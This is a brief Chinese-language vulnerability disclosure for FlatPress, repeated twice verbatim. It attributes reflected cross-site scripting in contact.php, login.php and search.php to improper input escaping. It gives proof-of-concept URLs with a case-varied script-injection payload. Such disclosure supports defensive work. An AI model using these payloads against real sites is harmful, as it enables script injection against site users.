#### 1. 漏洞成因 在contact.php、login.php、search.php页面中对输入的转义处理不恰当 #### 2.漏洞验证 ``` http://server/flatpress/contact.php/>"><ScRiPt>alert(test)</ScRiPt> ``` ``` http://server/flatpress/login.php/>"><ScRiPt>alert(test)</ScRiPt> ``` ``` http://server/flatpress/search.php/>"><ScRiPt>alert(test)</ScRiPt> ```
#### 1. 漏洞成因 在contact.php、login.php、search.php页面中对输入的转义处理不恰当 #### 2.漏洞验证 ``` http://server/flatpress/contact.php/>"><ScRiPt>alert(test)</ScRiPt> ``` ``` http://server/flatpress/login.php/>"><ScRiPt>alert(test)</ScRiPt> ``` ``` http://server/flatpress/search.php/>"><ScRiPt>alert(test)</ScRiPt> ```